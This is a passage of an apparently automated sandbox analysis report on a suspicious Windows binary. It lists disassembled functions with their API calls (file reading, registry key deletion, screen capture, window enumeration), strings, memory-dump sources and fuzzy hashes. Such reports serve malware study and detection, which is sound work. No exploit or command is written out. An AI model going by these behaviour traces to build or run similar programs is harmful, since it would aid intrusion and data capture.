                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: 3783f3223006778e84cd898096c23e1d5c4d1218d1c8f9b704202d1118919148
                                        • Instruction ID: 2e8396c5927b8134a52f6e373e5da08e3af152519a3b0f4577bc8c0f30f3d1e7
                                        • Opcode Fuzzy Hash: 3783f3223006778e84cd898096c23e1d5c4d1218d1c8f9b704202d1118919148
                                        • Instruction Fuzzy Hash: E55119B1500608AFDB219F65CDC8BBA7BFCEB08754F00441AF996D6650DB34EA44AB64
                                        Function 00C8856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00C88592
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885A2
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885AD
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885BA
                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885C8
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885D7
                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885E0
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885E7
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C885F8
                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C8FC38,?), ref: 00C88611
                                        • GlobalFree.KERNEL32(00000000), ref: 00C88621
                                        • GetObjectW.GDI32(?,00000018,?), ref: 00C88641
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00C88671
                                        • DeleteObject.GDI32(?), ref: 00C88699
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C886AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: b3ecbe9e7641c6a79fb18be1c6af319d3a2d829c7e7c33c4f95b20ea3e792e5c
                                        • Instruction ID: ed24df197c9fbfe13b161b92d4162435eba301ff5ffad91efea54444c193e31b
                                        • Opcode Fuzzy Hash: b3ecbe9e7641c6a79fb18be1c6af319d3a2d829c7e7c33c4f95b20ea3e792e5c
                                        • Instruction Fuzzy Hash: 61412775600208AFDB119FA5DC88FAE7BB9FF89B15F104059F915E72A0DB309E05DB28
                                        Function 00C614BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 00C61502
                                        • VariantCopy.OLEAUT32(?,?), ref: 00C6150B
                                        • VariantClear.OLEAUT32(?), ref: 00C61517
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C615FB
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00C61657
                                        • VariantInit.OLEAUT32(?), ref: 00C61708
                                        • SysFreeString.OLEAUT32(?), ref: 00C6178C
                                        • VariantClear.OLEAUT32(?), ref: 00C617D8
                                        • VariantClear.OLEAUT32(?), ref: 00C617E7
                                        • VariantInit.OLEAUT32(00000000), ref: 00C61823
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 1234038744-3931177956
                                        • Opcode ID: 6cd627684a4f5802e2565f616912b4bec36e52b6e3f9aa48d4c128889fb8f71d
                                        • Instruction ID: fc4a20a089dba8bcc16c383f580d7c1471cf94e9df9016b304aa997592354055
                                        • Opcode Fuzzy Hash: 6cd627684a4f5802e2565f616912b4bec36e52b6e3f9aa48d4c128889fb8f71d
                                        • Instruction Fuzzy Hash: 69D1CD31A00219EBDB209F66D8C5B7DF7B5BF44702F1C805AE906AB580EB30ED85DB61
                                        Function 00C7B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7B6AE,?,?), ref: 00C7C9B5
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7C9F1
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA68
                                          • Part of subcall function 00C7C998: _wcslen.LIBCMT ref: 00C7CA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7B6F4
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7B772
                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00C7B80A
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7B87E
                                        • RegCloseKey.ADVAPI32(?), ref: 00C7B89C
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C7B8F2
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7B904
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7B922
                                        • FreeLibrary.KERNEL32(00000000), ref: 00C7B983
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C7B994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 146587525-4033151799
                                        • Opcode ID: 7b6cf74c966dcfceabd9a2e9220932a79170513430b0ea8456b739029e1072ff
                                        • Instruction ID: 352e3e6412c3731d4f2f8c1f3142bd02f677462d71b718c450ecd22b5922a696
                                        • Opcode Fuzzy Hash: 7b6cf74c966dcfceabd9a2e9220932a79170513430b0ea8456b739029e1072ff
                                        • Instruction Fuzzy Hash: F8C16C30204201AFD714DF25C495F2ABBE5BF84358F14C59CF5AA8B2A2CB71ED49CB92
                                        Function 00C7255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00C725D8
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C725E8
                                        • CreateCompatibleDC.GDI32(?), ref: 00C725F4
                                        • SelectObject.GDI32(00000000,?), ref: 00C72601
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C7266D
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C726AC
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C726D0
                                        • SelectObject.GDI32(?,?), ref: 00C726D8
                                        • DeleteObject.GDI32(?), ref: 00C726E1
                                        • DeleteDC.GDI32(?), ref: 00C726E8
                                        • ReleaseDC.USER32(00000000,?), ref: 00C726F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: e25a7b9ef98df97d3bdc2e5b8892ecfdffc56b2c6354239fca4a899be0540b2d
                                        • Instruction ID: e170435b3a3b481c5db5f0b3a6625908d98764859d9efb7cb0fe461170734fa1
                                        • Opcode Fuzzy Hash: e25a7b9ef98df97d3bdc2e5b8892ecfdffc56b2c6354239fca4a899be0540b2d
                                        • Instruction Fuzzy Hash: A161F375D00219EFCF14CFA4D884AAEBBB6FF48310F20852AE959A7250E770A941DF64
                                        Function 00C2DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 00C2DAA1
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D659
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D66B
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D67D
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D68F
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6A1
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6B3
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6C5
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6D7
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6E9
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D6FB
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D70D
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D71F
                                          • Part of subcall function 00C2D63C: _free.LIBCMT ref: 00C2D731
                                        • _free.LIBCMT ref: 00C2DA96
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2DAB8
                                        • _free.LIBCMT ref: 00C2DACD
                                        • _free.LIBCMT ref: 00C2DAD8
                                        • _free.LIBCMT ref: 00C2DAFA
                                        • _free.LIBCMT ref: 00C2DB0D
                                        • _free.LIBCMT ref: 00C2DB1B
                                        • _free.LIBCMT ref: 00C2DB26
                                        • _free.LIBCMT ref: 00C2DB5E
                                        • _free.LIBCMT ref: 00C2DB65
                                        • _free.LIBCMT ref: 00C2DB82
                                        • _free.LIBCMT ref: 00C2DB9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 6b4ef6e51174243dcb74a8ff49b0256476a66acf677070d6eba8700273364f69
                                        • Instruction ID: c14823300babf9af60e70fc871098fe7d4356ca1beb3bf6c3b5723c826991f7d
                                        • Opcode Fuzzy Hash: 6b4ef6e51174243dcb74a8ff49b0256476a66acf677070d6eba8700273364f69
                                        • Instruction Fuzzy Hash: C6316B31604324AFEB21AB38F845B5A77E9FF24311F514419F46AD7991DF31AE80A720
                                        Function 00C5365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C5369C
                                        • _wcslen.LIBCMT ref: 00C536A7
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C53797
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C5380C
                                        • GetDlgCtrlID.USER32(?), ref: 00C5385D
                                        • GetWindowRect.USER32(?,?), ref: 00C53882
                                        • GetParent.USER32(?), ref: 00C538A0
                                        • ScreenToClient.USER32(00000000), ref: 00C538A7
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C53921
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C5395D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                        • String ID: %s%u
                                        • API String ID: 4010501982-679674701
                                        • Opcode ID: abde502a1e10b7753e30d719e08e6b2af5218769bd5b9c2be451c5f1670893b5
                                        • Instruction ID: c94aa58e627e9eb187fe719f7be68230343f8e9084c29f593d3bc6944d911de8
                                        • Opcode Fuzzy Hash: abde502a1e10b7753e30d719e08e6b2af5218769bd5b9c2be451c5f1670893b5
                                        • Instruction Fuzzy Hash: 5591D775204646AFD719DF24C885BEAF7A8FF44381F004529FDA9C2190DB30EB99CB95
                                        Function 00C54954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C54994
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C549DA
                                        • _wcslen.LIBCMT ref: 00C549EB
                                        • CharUpperBuffW.USER32(?,00000000), ref: 00C549F7
                                        • _wcsstr.LIBVCRUNTIME ref: 00C54A2C
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C54A64
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C54A9D
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C54AE6
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C54B20
                                        • GetWindowRect.USER32(?,?), ref: 00C54B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                        • String ID: ThumbnailClass
                                        • API String ID: 1311036022-1241985126
                                        • Opcode ID: cc6b0f97a0a816faddbd18c6fb8be93a47b1856670c6c78b724f7fd4fd5cbad6
                                        • Instruction ID: 919a9deb085f4aae813452a377aa8460d2b9ac704d77c5fb66794ced6a280052
                                        • Opcode Fuzzy Hash: cc6b0f97a0a816faddbd18c6fb8be93a47b1856670c6c78b724f7fd4fd5cbad6
                                        • Instruction Fuzzy Hash: 0891E6350042059FDB08CF14C985FAA77E8FF8435AF048469FD959A096EB30EEC9DB69
                                        Function 00C88D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C88D5A
                                        • GetFocus.USER32 ref: 00C88D6A
                                        • GetDlgCtrlID.USER32(00000000), ref: 00C88D75
                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C88E1D
                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C88ECF
                                        • GetMenuItemCount.USER32(?), ref: 00C88EEC
                                        • GetMenuItemID.USER32(?,00000000), ref: 00C88EFC
                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C88F2E
                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C88F70
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C88FA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                        • String ID: 0
                                        • API String ID: 1026556194-4108050209
                                        • Opcode ID: f4f36e7eee74e46c329bc18485718770efc922d76d9d99247b8909068c980070
                                        • Instruction ID: 36728bfb3cfa56eeafb5708fd66dc83daa220f684bb25e4ed689388593f724f5
                                        • Opcode Fuzzy Hash: f4f36e7eee74e46c329bc18485718770efc922d76d9d99247b8909068c980070
                                        • Instruction Fuzzy Hash: 4381B0715083019FDB10EF14D884BAB7BE9FF88318F54092DFA9497691DB30DA08DB69
                                        Function 00C5DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C5DC20
                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C5DC46
                                        • _wcslen.LIBCMT ref: 00C5DC50
                                        • _wcsstr.LIBVCRUNTIME ref: 00C5DCA0
                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C5DCBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 1939486746-1459072770
                                        • Opcode ID: f7279823f8766936fb09a04b62337f5c9083b978cb21cdeab2127626343ef41e
                                        • Instruction ID: a3020217df660855c9faf6da22eca8755d4bc2c6a62c976ea50ac2f8892f3a66
                                        • Opcode Fuzzy Hash: f7279823f8766936fb09a04b62337f5c9083b978cb21cdeab2127626343ef41e
                                        • Instruction Fuzzy Hash: 0C4121369403057ADB24AB64DC83EFF77ACEF46711F104069F901A61C2EA359A81A7B9
                                        Function 00C7CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7CC64
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C7CC8D
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7CD48
                                          • Part of subcall function 00C7CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C7CCAA
                                          • Part of subcall function 00C7CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C7CCBD
                                          • Part of subcall function 00C7CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C7CCCF
                                          • Part of subcall function 00C7CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C7CD05
                                          • Part of subcall function 00C7CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7CD28
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C7CCF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2734957052-4033151799
                                        • Opcode ID: 755de066505d46024d20f66ccb29adea97eccf6eaecc8eda02e68f4a6af24595
                                        • Instruction ID: 7b21900d30effb6c155724ddcf583fca8f0bac112f1c958dbef890e0042215d0
                                        • Opcode Fuzzy Hash: 755de066505d46024d20f66ccb29adea97eccf6eaecc8eda02e68f4a6af24595
                                        • Instruction Fuzzy Hash: F331697290112ABBDB218B51DCC8FEFBB7CEF55740F004169E91AE2240DB349B459BB4
                                        Function 00C63D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C63D40
                                        • _wcslen.LIBCMT ref: 00C63D6D
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C63D9D
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C63DBE
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00C63DCE
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C63E55
                                        • CloseHandle.KERNEL32(00000000), ref: 00C63E60
                                        • CloseHandle.KERNEL32(00000000), ref: 00C63E6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 1149970189-3457252023
                                        • Opcode ID: 46c31ab2011fc0aa5698305f9c4d66b27bace8859d2d15a5ef72e36a76acb7a7
                                        • Instruction ID: 7916c63ece15b3355e9eeb79455c92590ef71e3a36507b8e8d78c1d5f0c8d494
                                        • Opcode Fuzzy Hash: 46c31ab2011fc0aa5698305f9c4d66b27bace8859d2d15a5ef72e36a76acb7a7
                                        • Instruction Fuzzy Hash: 4E31A171910249ABDB219BA0DC89FEF37BCEF89700F1040B5F615D60A0E77497849B24
                                        Function 00C5E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 00C5E6B4
                                          • Part of subcall function 00C0E551: timeGetTime.WINMM(?,?,00C5E6D4), ref: 00C0E555
                                        • Sleep.KERNEL32(0000000A), ref: 00C5E6E1
                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C5E705
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C5E727
                                        • SetActiveWindow.USER32 ref: 00C5E746
